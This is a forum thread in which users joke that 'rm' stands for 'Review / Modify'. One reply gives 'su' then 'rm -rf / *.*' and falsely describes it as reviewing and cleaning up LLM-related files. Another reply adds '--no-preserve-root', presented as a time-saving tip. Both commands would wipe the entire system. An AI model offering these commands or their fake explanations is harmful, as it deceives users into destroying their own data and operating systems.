• some_guy
    link
    fedilink
    English
    arrow-up
    11
    ·
    5 小时前

    Are you saying that Review / Modify (the shorter title is actually more appropriate) doesn’t work? I’ve been using it to improve my LLM projects for a while now. I haven’t got around to Review / Modifying my whole /, but that’s just cause I’ve been busy. Luckily, today is a holiday in USA. I’m gonna set aside some time and improve my whole computer. It’s gonna be great.

    • InputZero@lemmy.world
      link
      fedilink
      arrow-up
      5
      ·
      4 小时前

      Expert tip: follow this code at your own risk.

      su

      Enter the sudo password

      rm -rf / *.*

      So what that command will do is go through your entire system and review and modify everything that supports the LLM and it’ll clean up all the files it uses.

    • droans@lemmy.world
      link
      fedilink
      arrow-up
      2
      ·
      4 小时前

      Keep in mind that, by default, POSIX systems assume you don’t actually want to spend all that time checking all the files on your system. You need to also use the flag --no-preserve-root.